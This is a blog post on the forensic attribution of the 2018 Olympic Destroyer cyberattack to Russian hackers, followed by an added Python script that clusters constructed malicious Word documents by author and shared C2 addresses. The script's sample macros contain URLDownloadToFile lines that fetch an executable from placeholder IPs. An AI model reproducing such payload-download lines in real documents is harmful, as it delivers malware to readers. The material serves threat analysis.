Published on October 18th, 2019
The incredible skullduggery used to try to blame the 2018 Olympic cyberattack on North Korea / Boing Boing
Wired has published another long excerpt from Sandworm, reporter Andy Greenberg's forthcoming book on the Russian hacking team that took state cyberattacks on physical infrastructure beyond the US-Israeli Stuxnet program, attacking Ukrainian power infrastructure and causing blackouts, in part by overwriting the firmware of embedded devices at substations so that operators could not restore them remotely.
Earlier installments covered NotPetya, the worm that spread beyond its Ukrainian targets, shut down major parts of the world's logistics and did more than $10 billion in damage, and the earlier attacks on Ukraine.
The latest installment drills down into the cyberattack on the 2018 Winter Olympics in Pyeongchang, South Korea, which took down the games' own IT infrastructure during the opening ceremony and threatened the organizers' ability to run the event.
But the real fun started after the attack, when forensic specialists went to work on the malware used to carry it out. The remnants were weird, tangled and obviously intentionally deceptive, planted so that an analyst would conclude that North Korean operatives had carried out the attack and clumsily tried to disguise it as someone else's work. But after an intense, global effort by experts who had been on the trail of "Sandworm", the Russian attackers behind the Ukraine attacks, a consensus emerged that blamed the Kremlin, humiliated and furious at Russia's exclusion from the games over its state-run doping program.
Over the next two days, Matonis searched for patterns in that obfuscation that might serve as a clue. When he wasn't at his laptop, he'd turn the puzzle over in his mind, in the shower or lying on the floor of his apartment, staring up at the ceiling. Finally, he found a telling pattern in the malware specimens' encoding. Matonis declined to share with me the details of this discovery for fear of tipping off the hackers to their tell. But he could see that, like teenage punks who all pin just the right obscure band's buttons to their jackets and style their hair in the same shapes, the attempt to make the encoded files look unique had instead made one set of them a distinctly recognizable group. He soon deduced that the source of that signal in the noise was a common tool used to create each one of the booby-trapped documents. It was an open source program, easily found online, called Malicious Macro Generator.
Matonis speculated that the hackers had chosen the program in order to blend in with a crowd of other malware authors, but it had ultimately had the opposite effect, setting them apart as a distinct set. Beyond their shared tools, the malware group was also tied together by the author names Matonis pulled from the files' metadata: Almost all had been written by someone named either “AV,” “BD,” or “john.” When he looked at the command and control servers that the malware connected back to—the strings that would control the puppetry of any successful infections—all but a few of the IP addresses of those machines overlapped too. The fingerprints were hardly exact. But over the next days, he assembled a loose mesh of clues that added up to a solid net, tying the fake Word documents together.
Only after he had established those hidden connections did Matonis go back to the Word documents that had served as the vehicles for each malware sample and begin to Google-translate their contents, some written in Cyrillic. Among the files he'd tied to the Olympic Destroyer bait, Matonis found two other bait documents from the collection that dated back to 2017 and seemed to target Ukrainian LGBT activist groups, using infected files that pretended to be a gay rights organization's strategy document and a map of a Kiev Pride parade. Others targeted Ukrainian companies and government agencies with a tainted copy of draft legislation.
The Untold Story of the 2018 Olympics Cyberattack, the Most Deceptive Hack in History [Andy Greenberg/Wired]
(Image: Joan Wong/Wired)
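The pivots the excerpt describes, clustering booby-trapped documents on the author recorded in their metadata and on overlapping command-and-control addresses, can be reproduced in a few dozen lines. The following is an added example and is not Matonis's tooling or code from the Wired piece: the Word files, author strings and IP addresses (taken from the reserved documentation ranges) are constructed in memory, the macro stream is plain text standing in for a real compressed VBA project, and the indicator weights and link threshold are illustrative assumptions. The encoding tell Matonis found is not described in the excerpt and is not modeled here.

```python
"""Cluster maldocs on metadata author and shared C2 addresses.

Added example, not code from the Wired excerpt or from Matonis. All samples
below are constructed in memory; the IPs come from RFC 5737 documentation
ranges and the "macro" is plain text standing in for a real VBA stream.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

CORE_NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Assumed weights: an overlapping C2 address is worth more than a shared
# author string, which anyone can set (or forge) in the document properties.
WEIGHTS = {"author": 1, "c2": 2}


def make_docx(author, macro_text):
    """Build a minimal OOXML zip with the two parts we inspect. Constructed
    sample: a real maldoc's word/vbaProject.bin is an OLE file holding
    MS-OVBA-compressed source, which oletools' olevba would decompress."""
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<cp:coreProperties xmlns:cp="{cp}" xmlns:dc="{dc}">'
        '<dc:creator>{author}</dc:creator></cp:coreProperties>'
    ).format(author=author, **CORE_NS)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/core.xml", core)
        z.writestr("word/vbaProject.bin", macro_text)
    return buf.getvalue()


def extract_features(docx_bytes):
    """Return {"author": str|None, "c2": set of IPv4 strings} for one file."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("docProps/core.xml"))
        macro_blob = z.read("word/vbaProject.bin").decode("latin-1", "replace")
    creator = root.find("dc:creator", CORE_NS)
    author = creator.text if creator is not None else None
    return {"author": author, "c2": set(IPV4.findall(macro_blob))}


def shared_score(a, b):
    """Weighted count of indicators two samples have in common."""
    score = 0
    if a["author"] and a["author"] == b["author"]:
        score += WEIGHTS["author"]
    score += WEIGHTS["c2"] * len(a["c2"] & b["c2"])
    return score


def cluster(features, min_score=2):
    """Union-find over samples; link any pair whose shared indicators score at
    least min_score. Returns a sorted list of sorted name tuples."""
    names = sorted(features)
    parent = {n: n for n in names}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for i, a in enumerate(names):
        for b in names[i + 1:]:
            if shared_score(features[a], features[b]) >= min_score:
                parent[find(a)] = find(b)
    groups = {}
    for n in names:
        groups.setdefault(find(n), []).append(n)
    return sorted(tuple(g) for g in groups.values())


def macro(*ips):
    """Constructed VBA-looking text that beacons to the given addresses."""
    return "\n".join('URLDownloadToFile 0, "http://%s/p.exe", tmp, 0, 0' % ip
                     for ip in ips)


# Constructed corpus: author strings and document names echo the excerpt;
# nothing here is a real sample, hash or address.
SAMPLES = {
    "olympic_bait.docx": make_docx("AV", macro("203.0.113.10")),
    "lgbt_strategy.docx": make_docx("BD", macro("203.0.113.10", "203.0.113.11")),
    "pride_map.docx": make_docx("john", macro("203.0.113.11")),
    "draft_law.docx": make_docx("AV", macro("198.51.100.7")),
    "unrelated.docx": make_docx("john", macro("192.0.2.55")),
}
FEATURES = {name: extract_features(blob) for name, blob in SAMPLES.items()}

if __name__ == "__main__":
    for threshold in (2, 1):
        print("min_score=%d:" % threshold)
        for group in cluster(FEATURES, min_score=threshold):
            print("  ", ", ".join(group))
```

Two points from the excerpt carry over directly. A single shared indicator is weak: with the default threshold the two "john" documents stay apart and draft_law.docx is not joined to olympic_bait.docx on the "AV" string alone, while lowering min_score to 1 merges the whole corpus. And the output is a map of which clues connect which files, to be weighed alongside tooling and targeting, not proof of a common operator on its own.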